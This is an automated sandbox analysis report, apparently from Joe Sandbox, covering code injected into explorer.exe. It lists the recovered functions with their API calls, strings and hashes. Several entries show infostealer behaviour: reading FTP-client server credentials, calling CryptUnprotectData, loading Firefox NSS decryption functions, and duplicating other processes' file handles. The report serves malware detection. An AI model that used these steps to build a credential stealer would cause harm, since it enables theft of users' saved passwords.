Download Yara Rule

APIs

HeapCreate.KERNELBASE(00000000,00BD0000,00000000), ref: 02799FF8

Strings

failed to HeapCreate (%lu), flags=%u, initSize=%lu, maxSize=%lu, xrefs: 0279A00E

Memory Dump Source

Source File: 00000011.00000002.2248826893.0000000002791000.00000040.80000000.00040000.00000000.sdmp, Offset: 02791000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_2791000_explorer.jbxd

Similarity

API ID: CreateHeap
String ID: failed to HeapCreate (%lu), flags=%u, initSize=%lu, maxSize=%lu
API String ID: 10892065-982776804
Opcode ID: b2b1849a4b3648b129fcd8c31d3a9d11a1c67015676fcaca3338fa4e8abd3f0a
Instruction ID: a71cb9d5138c94590c3b168f7d2b4dc1f17d95b27ecf798acd456c0b8f9b29d7
Opcode Fuzzy Hash: b2b1849a4b3648b129fcd8c31d3a9d11a1c67015676fcaca3338fa4e8abd3f0a
Instruction Fuzzy Hash: F7F0F6B3A48341FAFF301959BC88F27A79DD789785F504819FE4A96240F371AC018630

Function 02791AFE Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 42COMMON

Download Yara Rule

APIs

Part of subcall function 02791000: GetProcessHeap.KERNEL32(00000008,?,027911C7,?,?,00000001,00000000,?), ref: 02791003
Part of subcall function 02791000: RtlAllocateHeap.NTDLL(00000000), ref: 0279100A

SHGetFolderPathW.SHELL32(00000000,0000001A,00000000,00000000,00000000,00000000,?,?,02792E83,PathToExe,00000000,00000000), ref: 02791B16

Part of subcall function 02791011: GetProcessHeap.KERNEL32(00000000,00000000,?,02791A92,?,?,00000000,-00000201,?,?,00000016,?,?,?,?,02791AE2), ref: 02791020
Part of subcall function 02791011: RtlFreeHeap.NTDLL(00000000,?,?,00000000,-00000201,?,?,00000016,?,?,?,?,02791AE2,PortNumber,00000000,00000000), ref: 02791027

Part of subcall function 027919E5: RegOpenKeyExW.KERNELBASE(?,?,00000000,-00000201,?,?,00000016,?,?,?,?,02791AE2,PortNumber,00000000,00000000), ref: 02791A1E
Part of subcall function 027919E5: RegQueryValueExW.KERNELBASE(?,?,00000000,?,00000000,?,?,?,00000000,-00000201,?,?,00000016), ref: 02791A3C
Part of subcall function 027919E5: RegQueryValueExW.KERNELBASE(?,?,00000000,00000000,00000000,?,?,?,00000000,-00000201,?,?,00000016), ref: 02791A75
Part of subcall function 027919E5: RegCloseKey.KERNELBASE(?,?,?,00000000,-00000201,?,?,00000016,?,?,?,?,02791AE2,PortNumber,00000000,00000000), ref: 02791A98

Strings

Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders, xrefs: 02791B40

Memory Dump Source

Source File: 00000011.00000002.2248826893.0000000002791000.00000040.80000000.00040000.00000000.sdmp, Offset: 02791000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_2791000_explorer.jbxd

Similarity

API ID: Heap$ProcessQueryValue$AllocateCloseFolderFreeOpenPath
String ID: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
API String ID: 2162223993-2036018995
Opcode ID: e92d5c36ef7092bc1d91517947ecc14f7d7d39ccedcfc2204819f3422b3b214e
Instruction ID: 0f69008cb4c0d68d2add6e582bd3c4172359e0e089628c80bbcda2f2cb8693c7
Opcode Fuzzy Hash: e92d5c36ef7092bc1d91517947ecc14f7d7d39ccedcfc2204819f3422b3b214e
Instruction Fuzzy Hash: 0CF0593274074957EE12692EEC88E3B374FCBC22F67834029F41EA7201EE23AC215274

Function 0279A33B Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 36COMMON

Download Yara Rule

APIs

SetFilePointer.KERNELBASE(?,?,?,00000000), ref: 0279A35F

Strings

winSeekFile, xrefs: 0279A381

Memory Dump Source

Source File: 00000011.00000002.2248826893.0000000002791000.00000040.80000000.00040000.00000000.sdmp, Offset: 02791000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_2791000_explorer.jbxd

Similarity

API ID: FilePointer
String ID: winSeekFile
API String ID: 973152223-3168307952
Opcode ID: c637f443e826e0129a45e6d823f67d9d5a35dd5ef5c5ce5b1c12ddf52b313e93
Instruction ID: 5ac1800e5faa2eb9e306ff26cbc505634b9f430f8b8a665cd7c6d68247fa2dd4
Opcode Fuzzy Hash: c637f443e826e0129a45e6d823f67d9d5a35dd5ef5c5ce5b1c12ddf52b313e93
Instruction Fuzzy Hash: EFF02430A15304EFEB119F24EC009BB77AAEB84320F10C769F926CA2C0DB30DD109AA0

Function 02799EA7 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 21memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(04D10000,00000000,?), ref: 02799EB5

Strings

failed to HeapAlloc %u bytes (%lu), heap=%p, xrefs: 02799ECD

Memory Dump Source

Source File: 00000011.00000002.2248826893.0000000002791000.00000040.80000000.00040000.00000000.sdmp, Offset: 02791000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_2791000_explorer.jbxd

Similarity

API ID: AllocateHeap
String ID: failed to HeapAlloc %u bytes (%lu), heap=%p
API String ID: 1279760036-667713680
Opcode ID: 2891f40aea7878cf5c3a6080f8b5f71c25fceb8679da0829b84aaa7abaecd0f2
Instruction ID: 7564f6a6dd7e7945c56a9623d7914c4cb2be6a90b07e40b0d2a7988cad57484e
Opcode Fuzzy Hash: 2891f40aea7878cf5c3a6080f8b5f71c25fceb8679da0829b84aaa7abaecd0f2
Instruction Fuzzy Hash: 6FE0C2B3A88310BBDA122684BC04F2FBB6ADB95F10F058415FB05A6200C230982187B6

Function 02799EE8 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 19memoryCOMMON

Download Yara Rule

APIs

RtlFreeHeap.NTDLL(04D10000,00000000,?), ref: 02799EF8

Strings

failed to HeapFree block %p (%lu), heap=%p, xrefs: 02799F0E

Memory Dump Source

Source File: 00000011.00000002.2248826893.0000000002791000.00000040.80000000.00040000.00000000.sdmp, Offset: 02791000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_2791000_explorer.jbxd

Similarity

API ID: FreeHeap
String ID: failed to HeapFree block %p (%lu), heap=%p
API String ID: 3298025750-4030396798
Opcode ID: c965d2db26614a733b23529880203b32ac3ffa031950388c344f584a6f1f6d52
Instruction ID: 1815284ca70f804139743cb761f63fc19c4fc1729b3cf34d1c616c00bd833d54
Opcode Fuzzy Hash: c965d2db26614a733b23529880203b32ac3ffa031950388c344f584a6f1f6d52
Instruction Fuzzy Hash: 31D0C2B354C300F7EA116A50AC05F2BBB3A9B86B00F44480CF30555015C3705061AB35

Function 02791B6A Relevance: 3.0, APIs: 2, Instructions: 25fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNELBASE(00000000,00000080,00000000,00000000,00000003,00000000,00000000,00000000,02792893,00000000,00000000,00000000,?), ref: 02791B82
CloseHandle.KERNELBASE(00000000), ref: 02791B8F

Memory Dump Source

Source File: 00000011.00000002.2248826893.0000000002791000.00000040.80000000.00040000.00000000.sdmp, Offset: 02791000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_2791000_explorer.jbxd

Similarity

API ID: CloseCreateFileHandle
String ID:
API String ID: 3498533004-0
Opcode ID: c96bbe3d4ed111b4c44a647a69504615f4ae5d1570b7f8fc7822c1804e7d5412
Instruction ID: 54ffd58e55c30cd72a83b9ec0bffef9294ff085e13a58fba200275fcd0e5272f
Opcode Fuzzy Hash: c96bbe3d4ed111b4c44a647a69504615f4ae5d1570b7f8fc7822c1804e7d5412
Instruction Fuzzy Hash: C8D01771693731A2EDB566397C0CEA76E1DDF06ABDB444A14B41DD91C0E32488A782F0

Function 02791000 Relevance: 3.0, APIs: 2, Instructions: 6memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000008,?,027911C7,?,?,00000001,00000000,?), ref: 02791003
RtlAllocateHeap.NTDLL(00000000), ref: 0279100A

Memory Dump Source

Source File: 00000011.00000002.2248826893.0000000002791000.00000040.80000000.00040000.00000000.sdmp, Offset: 02791000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_2791000_explorer.jbxd

Similarity

API ID: Heap$AllocateProcess
String ID:
API String ID: 1357844191-0
Opcode ID: b1cf815c875cceb589a5bb45341715a37f1c0f0075b18fd6a9e686507f96effc
Instruction ID: 0ac5da1f9ad65d139b9bdf11e206b9dde6c19a2ee3ad60db97adc625ae1b37aa
Opcode Fuzzy Hash: b1cf815c875cceb589a5bb45341715a37f1c0f0075b18fd6a9e686507f96effc
Instruction Fuzzy Hash: B9A00275D90104DBDD4557A49A0DA1E351DF758702F10894471458A041D97454148731

Function 027912A3 Relevance: 1.6, APIs: 1, Instructions: 61COMMON

Download Yara Rule

APIs

RtlZeroMemory.NTDLL(?,00000018), ref: 027912B5

Memory Dump Source

Source File: 00000011.00000002.2248826893.0000000002791000.00000040.80000000.00040000.00000000.sdmp, Offset: 02791000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_2791000_explorer.jbxd

Similarity

API ID: MemoryZero
String ID:
API String ID: 816449071-0
Opcode ID: e33a84685c145de7ee79c91db66a6931358cf1ef847d12dcec8259c733f4eea6
Instruction ID: 01effb7f7e78657b49294d6d5bf9a6e98000e86e007dc824731db64039fc5711
Opcode Fuzzy Hash: e33a84685c145de7ee79c91db66a6931358cf1ef847d12dcec8259c733f4eea6
Instruction Fuzzy Hash: 8111F8B5F01209AFDF10DFA5E984AAEB7BCEB08251B508429F949E7240D730D910CB70

Function 02791B9D Relevance: 1.5, APIs: 1, Instructions: 19COMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNELBASE(00000000,00000000,02792C8F,00000000,00000000,?,?,00000000,PathToExe,00000000,00000000), ref: 02791BAA

Memory Dump Source

Source File: 00000011.00000002.2248826893.0000000002791000.00000040.80000000.00040000.00000000.sdmp, Offset: 02791000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_2791000_explorer.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 133034c9f559f8d9c215b248bcfb8b8157e107be7312618815f47781fe2c195c
Instruction ID: 1abf5b0de9c1b02184c27f4444439157fa684e786c210434b02e6fe888626874
Opcode Fuzzy Hash: 133034c9f559f8d9c215b248bcfb8b8157e107be7312618815f47781fe2c195c
Instruction Fuzzy Hash: DAD0A933E0263282DE64563C3804892A2816A0057839A07B4FC2AF70C0E324CCA282D0

Function 02791677 Relevance: 1.5, APIs: 1, Instructions: 13COMMON

Download Yara Rule

APIs

CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 02791684

Memory Dump Source

Source File: 00000011.00000002.2248826893.0000000002791000.00000040.80000000.00040000.00000000.sdmp, Offset: 02791000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_2791000_explorer.jbxd

Similarity

API ID: CreateGlobalStream
String ID:
API String ID: 2244384528-0
Opcode ID: d1f605da9b6381f220f1a81e72eb8e441f23255b9cc9304772a9715d6e571011
Instruction ID: 539e1364d2f9b0ee8a94d73e71b60f7a82a6d679f76e244c0cc041300381efe7
Opcode Fuzzy Hash: d1f605da9b6381f220f1a81e72eb8e441f23255b9cc9304772a9715d6e571011
Instruction Fuzzy Hash: E8C08C30960232DFEB301A309C09B8636D8AF19BB2F060D69E0C5DD0C0E6F408D0CAA0

Function 0279104C Relevance: 1.3, APIs: 1, Instructions: 6memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040,0279158A), ref: 02791056

Memory Dump Source

Source File: 00000011.00000002.2248826893.0000000002791000.00000040.80000000.00040000.00000000.sdmp, Offset: 02791000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_2791000_explorer.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: d65c782b5174beb32231dbc689612d7d9af877553c0b1165147673032a5d030d
Instruction ID: 6037aa996cd3f040cc40e376d455c03bfbc7d9fce9ff793625b3f83d7c0d8b7e
Opcode Fuzzy Hash: d65c782b5174beb32231dbc689612d7d9af877553c0b1165147673032a5d030d
Instruction Fuzzy Hash: 17A001B0BD5210AAFD696762AE1BF2529289754B12F104644B3096C0C055E475108529

Function 0279105D Relevance: 1.3, APIs: 1, Instructions: 5COMMON

Download Yara Rule

APIs

VirtualFree.KERNELBASE(00000000,00000000,00008000,02794A5B,?,?,00000000,?,?,?,?,02794B66,?), ref: 02791065

Memory Dump Source

Source File: 00000011.00000002.2248826893.0000000002791000.00000040.80000000.00040000.00000000.sdmp, Offset: 02791000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_2791000_explorer.jbxd

Similarity

API ID: FreeVirtual
String ID:
API String ID: 1263568516-0
Opcode ID: 988fe7615a082dfecee929cca8129c342e9809c27dbe3c4ebe0cdded5fb63623
Instruction ID: 21863d8d9542dbad3cbc080d8d1ef91ba2641921634ef59fa0a3f5716983fba8
Opcode Fuzzy Hash: 988fe7615a082dfecee929cca8129c342e9809c27dbe3c4ebe0cdded5fb63623
Instruction Fuzzy Hash: 9CA00270ED0700A6EDB557205D0AF0526186754B11F2089447241AD0C159B5E0548A28

Non-executed Functions

Function 0279349B Relevance: 35.2, APIs: 19, Strings: 1, Instructions: 201nativefilestringCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,00000080,00000000,00000000,00000003,00000000,00000000,00000000,00000000,?,00000000), ref: 027934C0

Part of subcall function 027933C3: NtQueryInformationFile.NTDLL(00000000,00002000,00000000,00002000,0000002F), ref: 02793401

OpenProcess.KERNEL32(00000440,00000000,00000000,?,00000000,?,?,?,?,?,?,?,?,?,027937A8), ref: 027934E9

Part of subcall function 02791000: GetProcessHeap.KERNEL32(00000008,?,027911C7,?,?,00000001,00000000,?), ref: 02791003
Part of subcall function 02791000: RtlAllocateHeap.NTDLL(00000000), ref: 0279100A

NtQueryInformationProcess.NTDLL(00000000,00000033,00000000,?,?), ref: 0279351E
NtQueryInformationProcess.NTDLL(00000000,00000033,00000000,?,?), ref: 02793541
GetCurrentProcess.KERNEL32(?,00000000,00000000,00000002), ref: 02793586
DuplicateHandle.KERNEL32(00000000,00000000,00000000), ref: 0279358F
lstrcmpiW.KERNEL32(00000000,File), ref: 027935B6
NtQueryObject.NTDLL(?,00000001,00000000,00001000,00000000), ref: 027935DE
StrRChrW.SHLWAPI(?,00000000,0000005C), ref: 027935F6
StrRChrW.SHLWAPI(?,00000000,0000005C), ref: 02793606
lstrcmpiW.KERNEL32(00000000,00000000), ref: 0279361E
GetFileSize.KERNEL32(?,00000000), ref: 02793631
SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 02793658
SetFilePointer.KERNEL32(?,00000000,00000000,00000000), ref: 0279366B
ReadFile.KERNEL32(?,?,00000000,?,00000000), ref: 02793681
SetFilePointer.KERNEL32(?,?,00000000,00000000), ref: 027936AD
CloseHandle.KERNEL32(?), ref: 027936C0
CloseHandle.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,027937A8), ref: 027936F5

Part of subcall function 02791C9F: CreateFileW.KERNEL32(?,40000000,00000002,00000000,00000002,00000000,00000000), ref: 02791CC0
Part of subcall function 02791C9F: WriteFile.KERNEL32(00000000,?,?,?,00000000,?,40000000,00000002,00000000,00000002,00000000,00000000), ref: 02791CDA
Part of subcall function 02791C9F: CloseHandle.KERNEL32(00000000,?,?,?,00000000,?,40000000,00000002,00000000,00000002,00000000,00000000), ref: 02791CE6

CloseHandle.KERNEL32(?,?,00000000,?,?,?,?,?,?,?,?,?,027937A8), ref: 02793707

Strings

File, xrefs: 027935B0

Memory Dump Source

Source File: 00000011.00000002.2248826893.0000000002791000.00000040.80000000.00040000.00000000.sdmp, Offset: 02791000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_2791000_explorer.jbxd

Similarity

API ID: File$HandleProcess$CloseQuery$InformationPointer$CreateHeaplstrcmpi$AllocateCurrentDuplicateObjectOpenReadSizeWrite
String ID: File
API String ID: 3915112439-749574446
Opcode ID: 0de35bf41a9a32ff120b23a1a0d1e9564c67cbff54fb266e12399a3f06d1a807
Instruction ID: 47f8bbb1e725e96948991f24e53203f92045019d7e59c3f788c62963299dfd43
Opcode Fuzzy Hash: 0de35bf41a9a32ff120b23a1a0d1e9564c67cbff54fb266e12399a3f06d1a807
Instruction Fuzzy Hash: E6618070644301AFDB219F24EC88F2B7BFDEB88764F00492CF946AA291D775D9648F61

Function 027E4438 Relevance: 19.9, APIs: 3, Strings: 10, Instructions: 359COMMON

Download Yara Rule

APIs

memcmp.NTDLL(localhost,00000007,00000009,00000002,?,00000000,000001D8,?,00000000), ref: 027E4502
memcmp.NTDLL(00000000,?,?,00000002,?,00000000,000001D8,?,00000000), ref: 027E475F
memcpy.NTDLL(00000000,00000000,00000000,00000002,?,00000000,000001D8,?,00000000), ref: 027E4803

Strings

cach, xrefs: 027E46DC
access, xrefs: 027E4725
mode, xrefs: 027E4712
localhost, xrefs: 027E44FD
cache, xrefs: 027E46FA
invalid uri authority: %.*s, xrefs: 027E4513
no such vfs: %s, xrefs: 027E482F
no such %s mode: %s, xrefs: 027E4784
file, xrefs: 027E4474
%s mode not allowed: %s, xrefs: 027E47D0

Memory Dump Source

Source File: 00000011.00000002.2248826893.0000000002791000.00000040.80000000.00040000.00000000.sdmp, Offset: 02791000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_2791000_explorer.jbxd

Similarity

API ID: memcmp$memcpy
String ID: %s mode not allowed: %s$access$cach$cache$file$invalid uri authority: %.*s$localhost$mode$no such %s mode: %s$no such vfs: %s
API String ID: 231171946-1096842476
Opcode ID: 8d97d3d05a70c7f8bc6cfce19c5b9dc243f39c3a2be40932de641d72787e928a
Instruction ID: 0ce59f5cb3ab5a5b0e06afa1db8abf6e4eac45fe2d46ef62cf3601f43b0ae350
Opcode Fuzzy Hash: 8d97d3d05a70c7f8bc6cfce19c5b9dc243f39c3a2be40932de641d72787e928a
Instruction Fuzzy Hash: 1CC1E2B0A083929BDF35CE1884A577BB7E2AF8E318F04052EE4D797251D734D445CBA6

Function 027B5F08 Relevance: 12.3, APIs: 1, Strings: 7, Instructions: 328COMMON

Download Yara Rule

APIs

Part of subcall function 02796AAA: memset.NTDLL ref: 02796AC5

memset.NTDLL ref: 027B5F53

Strings

foreign key, xrefs: 027B60A3
indexed, xrefs: 027B60E8
no such column: "%s", xrefs: 027B6271
cannot open view: %s, xrefs: 027B5FF3
cannot open table without rowid: %s, xrefs: 027B5FCF
cannot open %s column for writing, xrefs: 027B6255
cannot open virtual table: %s, xrefs: 027B5FAA

Memory Dump Source

Source File: 00000011.00000002.2248826893.0000000002791000.00000040.80000000.00040000.00000000.sdmp, Offset: 02791000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_2791000_explorer.jbxd

Similarity

API ID: memset
String ID: cannot open %s column for writing$cannot open table without rowid: %s$cannot open view: %s$cannot open virtual table: %s$foreign key$indexed$no such column: "%s"
API String ID: 2221118986-594550510
Opcode ID: aa3389a1fceff8e1a53326f1a1daa59f805575176a76b46b6973c2b4eaea1e4a
Instruction ID: fd5c409f3617db0980aa4b5fda0eb21d442d59d1366b4a7b37314255ba6fecaf
Opcode Fuzzy Hash: aa3389a1fceff8e1a53326f1a1daa59f805575176a76b46b6973c2b4eaea1e4a
Instruction Fuzzy Hash: 06C19B70A04702AFDB16DF25C484BABB7E6BF88714F04892DF94597241E731D952CF92

Function 02792112 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 29timeCOMMON

Download Yara Rule

APIs

Part of subcall function 02791000: GetProcessHeap.KERNEL32(00000008,?,027911C7,?,?,00000001,00000000,?), ref: 02791003
Part of subcall function 02791000: RtlAllocateHeap.NTDLL(00000000), ref: 0279100A

GetSystemTimeAsFileTime.KERNEL32(?), ref: 02792127
_alldiv.NTDLL(?,?,00989680,00000000), ref: 0279213A
wsprintfA.USER32 ref: 0279214F

Strings

%li, xrefs: 02792149

Memory Dump Source

Source File: 00000011.00000002.2248826893.0000000002791000.00000040.80000000.00040000.00000000.sdmp, Offset: 02791000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_2791000_explorer.jbxd

Similarity

API ID: HeapTime$AllocateFileProcessSystem_alldivwsprintf
String ID: %li
API String ID: 4120667308-1021419598
Opcode ID: 48b15935bf713c44c6beb6b4339177e3f643802399795ea840dcd565ca694880
Instruction ID: e98b72ac5d42c609a0c4df9050ba8f7f2ae1997e272e659e44ea58933286994d
Opcode Fuzzy Hash: 48b15935bf713c44c6beb6b4339177e3f643802399795ea840dcd565ca694880
Instruction Fuzzy Hash: 52E09232A4021877DB223BA89C0AEAE7B6DDB44A15F404595FA05F6141E9724A3487E5

Function 0279123B Relevance: 4.5, APIs: 3, Instructions: 49encryptionstringCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,02793E4B,00000000), ref: 0279124A
CryptStringToBinaryA.CRYPT32(00000000,00000000,00000001,00000000,?,00000000,00000000), ref: 02791268

Part of subcall function 02791000: GetProcessHeap.KERNEL32(00000008,?,027911C7,?,?,00000001,00000000,?), ref: 02791003
Part of subcall function 02791000: RtlAllocateHeap.NTDLL(00000000), ref: 0279100A

CryptStringToBinaryA.CRYPT32(00000000,00000000,00000001,00000000,?,00000000,00000000), ref: 02791295

Memory Dump Source

Source File: 00000011.00000002.2248826893.0000000002791000.00000040.80000000.00040000.00000000.sdmp, Offset: 02791000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_2791000_explorer.jbxd

Similarity

API ID: BinaryCryptHeapString$AllocateProcesslstrlen
String ID:
API String ID: 117552131-0
Opcode ID: c4255cfb7c79da56695641141accf74ac1f9ff79a23a2e15c82f2410be98fefe
Instruction ID: 96b897f86dbebbae15b7839dcf6e04b6eeb74527a93b8f3b171252187765fb74
Opcode Fuzzy Hash: c4255cfb7c79da56695641141accf74ac1f9ff79a23a2e15c82f2410be98fefe
Instruction Fuzzy Hash: B001A2B1600316AFEB18CF15DC89FBBB7ACEB84655F00462EF505C6240EBB1DC018A70

Function 027911E1 Relevance: 4.5, APIs: 3, Instructions: 46encryptionstringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(?,74DEF360,00000000,?,00000000,?,027946E3), ref: 027911ED
CryptStringToBinaryW.CRYPT32(?,00000000,00000001,00000000,?,00000000,00000000), ref: 0279120F

Part of subcall function 02791000: GetProcessHeap.KERNEL32(00000008,?,027911C7,?,?,00000001,00000000,?), ref: 02791003
Part of subcall function 02791000: RtlAllocateHeap.NTDLL(00000000), ref: 0279100A

CryptStringToBinaryW.CRYPT32(?,00000000,00000001,00000000,?,00000000,00000000), ref: 02791231

Memory Dump Source

Source File: 00000011.00000002.2248826893.0000000002791000.00000040.80000000.00040000.00000000.sdmp, Offset: 02791000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_2791000_explorer.jbxd

Similarity

API ID: BinaryCryptHeapString$AllocateProcesslstrlen
String ID:
API String ID: 117552131-0
Opcode ID: a16179d529a2e13d1e6bac25dc7f3a074367cb0e8030e6dd01fd4337d2f9d972
Instruction ID: 85fdf23facad226bb7d276cbd5d9d06a9895afd7cd4bcb9e9167a2ef1565de48
Opcode Fuzzy Hash: a16179d529a2e13d1e6bac25dc7f3a074367cb0e8030e6dd01fd4337d2f9d972
Instruction Fuzzy Hash: 5EF0F67270430E7BE6109E46EC80FA77B9DDF95694F10002EB601C6140DEA2ED0586B4

Function 02791FCE Relevance: 3.0, APIs: 2, Instructions: 49encryptionCOMMON

Download Yara Rule

APIs

CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 02791FFA
RtlMoveMemory.NTDLL(?,?,?), ref: 02792015

Memory Dump Source

Source File: 00000011.00000002.2248826893.0000000002791000.00000040.80000000.00040000.00000000.sdmp, Offset: 02791000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_2791000_explorer.jbxd

Similarity

API ID: CryptDataMemoryMoveUnprotect
String ID:
API String ID: 2807545630-0
Opcode ID: ae9ff05315d8ade9847e3319bc3c04343c34b4526081e1f503d8fffd9a419cc3
Instruction ID: 2c76156a9972b5fe4bde896e9c230b90b267978f4f8b9cfcee35eeaec3ebb897
Opcode Fuzzy Hash: ae9ff05315d8ade9847e3319bc3c04343c34b4526081e1f503d8fffd9a419cc3
Instruction Fuzzy Hash: 66012171A01219BB9B15DF99E884DAFBBBCEF15250B10446AF905D3201D7719A10CBA0

Function 02791198 Relevance: 3.0, APIs: 2, Instructions: 38encryptionCOMMON

Download Yara Rule

APIs

CryptBinaryToStringA.CRYPT32(?,?,00000001,00000000,?), ref: 027911B2

Part of subcall function 02791000: GetProcessHeap.KERNEL32(00000008,?,027911C7,?,?,00000001,00000000,?), ref: 02791003
Part of subcall function 02791000: RtlAllocateHeap.NTDLL(00000000), ref: 0279100A

CryptBinaryToStringA.CRYPT32(?,?,00000001,00000000,?,?,?,00000001,00000000,?), ref: 027911D2

Memory Dump Source

Source File: 00000011.00000002.2248826893.0000000002791000.00000040.80000000.00040000.00000000.sdmp, Offset: 02791000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_2791000_explorer.jbxd

Similarity

API ID: BinaryCryptHeapString$AllocateProcess
String ID:
API String ID: 3825993179-0
Opcode ID: 1f8c25583a226fa0fad1a61dceef42781d1ba45aa287c1012b79d6753cc99a94
Instruction ID: 8fce9695a0b2c49de8bf25b262cafb91d0e162197fd34508d6ebabc207ed38a8
Opcode Fuzzy Hash: 1f8c25583a226fa0fad1a61dceef42781d1ba45aa287c1012b79d6753cc99a94
Instruction Fuzzy Hash: 7BF02736600219B7CB20C59BDC88DEBFB6DCF856B0B00016AF90CD7100DA728D10C7B0

Function 02794440 Relevance: 38.8, APIs: 12, Strings: 10, Instructions: 289stringcommemoryCOMMON

Download Yara Rule

APIs

CoCreateInstance.COMBASE(027E62B0,00000000,00000001,027E62A0,?), ref: 0279445F
SysAllocString.OLEAUT32(?), ref: 027944AA
lstrcmpiW.KERNEL32(RecentServers,?), ref: 0279456E
lstrcmpiW.KERNEL32(Servers,?), ref: 0279457D
lstrcmpiW.KERNEL32(Settings,?), ref: 0279458C

Part of subcall function 027911E1: lstrlenW.KERNEL32(?,74DEF360,00000000,?,00000000,?,027946E3), ref: 027911ED
Part of subcall function 027911E1: CryptStringToBinaryW.CRYPT32(?,00000000,00000001,00000000,?,00000000,00000000), ref: 0279120F
Part of subcall function 027911E1: CryptStringToBinaryW.CRYPT32(?,00000000,00000001,00000000,?,00000000,00000000), ref: 02791231

lstrcmpiW.KERNEL32(Server,?), ref: 027945BE
lstrcmpiW.KERNEL32(LastServer,?), ref: 027945CD
lstrcmpiW.KERNEL32(Host,?), ref: 02794657
lstrcmpiW.KERNEL32(Port,?), ref: 02794679
lstrcmpiW.KERNEL32(User,?), ref: 0279469F
lstrcmpiW.KERNEL32(Pass,?), ref: 027946C5
wsprintfW.USER32 ref: 0279471E

Strings

Servers, xrefs: 02794578
Host, xrefs: 02794652
User, xrefs: 0279469A
Port, xrefs: 02794674
Settings, xrefs: 02794587
LastServer, xrefs: 027945C8
%s:%s, xrefs: 02794718
Pass, xrefs: 027946C0
Server, xrefs: 027945B9
RecentServers, xrefs: 02794569

Memory Dump Source

Source File: 00000011.00000002.2248826893.0000000002791000.00000040.80000000.00040000.00000000.sdmp, Offset: 02791000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_2791000_explorer.jbxd

Similarity

API ID: lstrcmpi$String$BinaryCrypt$AllocCreateInstancelstrlenwsprintf
String ID: %s:%s$Host$LastServer$Pass$Port$RecentServers$Server$Servers$Settings$User
API String ID: 2230072276-1234691226
Opcode ID: faa966de6d4fdc856dfc3a2f6977ef69c15fa712f0d6c2dfddef46dec15c4a66
Instruction ID: 1d19dc73dd19d780b9020a17fc2f2653e8391cd3011d585d1f8d2b4b5aae116c
Opcode Fuzzy Hash: faa966de6d4fdc856dfc3a2f6977ef69c15fa712f0d6c2dfddef46dec15c4a66
Instruction Fuzzy Hash: CCB10971204306AFDB00DF64D894E6A77F9EFC9759F00895CF6558B260DB72E806CB62

Function 027924B0 Relevance: 35.1, APIs: 11, Strings: 9, Instructions: 143libraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 02791000: GetProcessHeap.KERNEL32(00000008,?,027911C7,?,?,00000001,00000000,?), ref: 02791003
Part of subcall function 02791000: RtlAllocateHeap.NTDLL(00000000), ref: 0279100A

Part of subcall function 02791090: lstrlenW.KERNEL32(?,?,00000000,027917E5), ref: 02791097
Part of subcall function 02791090: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000001,00000000,00000000), ref: 027910A8

Part of subcall function 027919B4: lstrlenW.KERNEL32(00000000,00000000,00000000,02792CAF,00000000,00000000,?,?,00000000,PathToExe,00000000,00000000), ref: 027919C4

GetCurrentDirectoryW.KERNEL32(00000104,00000000), ref: 02792503
SetCurrentDirectoryW.KERNEL32(00000000), ref: 0279250A
LoadLibraryW.KERNEL32(00000000), ref: 02792563
SetCurrentDirectoryW.KERNEL32(?), ref: 02792570
GetProcAddress.KERNEL32(00000000,NSS_Init), ref: 02792591
GetProcAddress.KERNEL32(00000000,NSS_Shutdown), ref: 0279259E
GetProcAddress.KERNEL32(00000000,SECITEM_FreeItem), ref: 027925AB
